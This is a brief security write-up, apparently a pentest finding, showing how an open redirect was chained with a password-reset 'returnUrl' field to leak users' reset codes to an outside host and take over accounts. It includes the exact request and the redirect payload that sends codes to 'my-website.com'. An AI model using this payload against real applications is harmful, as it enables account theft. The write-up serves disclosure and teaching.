Hack Reset Password Code Using Open Redirect

Sherif Afifi
Dec 29, 2019 · 2 min read

While I was testing one of our clients web-application, I found an Open Redirect vulnerability in a parameter named “return”
https://app.reacted.com/login?return=https://google.com ,, very simple…

Wrote it down and continued testing and while I was testing the reset password functionality I came across the following request responsible to reset user password

POST /ForgotPassword HTTP/1.1

Host: app.reacted.com

— {some headers}

Cookie: cookies,,,

DNT: 1

Connection: close

{“email”:”my-email@gmail.com”,”returnUrl”:”/reset/password/:userId/:code”}

The JSON key “returnUrl” looks really interesting,,,

Yes the first thing came to my mind is to try
”returnUrl”:”https://my-website.com/reset/password/:userId/:code”
So That when user clicks the reset password link he should be redirected to “my-website.com” with the reset code, but this results in 500 Error response

Trying ,,,
https://my-website.com/reset/password/:userId/:code >> 500 error

“//my-website.com/reset/password/:userId/:code” >> 200 OK >> but reset link was “https://app.reacted.com//my-website.com/reset/password/{user-ID}/{Reset-Code}

“bla-bla.com/reset/password/:userId/:code” >> 500 Error

After some trails I found that there is a check in the backed which ensures that the returnUrl value starts with “ / ”

OK. So I came to an idea (yes you guessed it right), the idea was to use the open redirect vulnerability discovered before to redirect user with the reset code to “my-website.com” to get the code into my logs and be able to takeover the user account

So I changed the JSON key/value pair to be as following:
{”returnUrl”:”/login?return=https://my-website.com/reset/password/:userId/:code}

The received reset link was as following :
https://app.reacted.com/login?return=https://my-website.com/reset/password/{userID}/{Random-Code}

So it is clear now, I can reset the password for any user and manipulate the returnUrl as previously mentioned and if the user clicked the link sent to his inbox, he will be redirect to the app then to my-website.com with his UserID and reset code, which can be used later to takeover the user account.

Thanks,

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade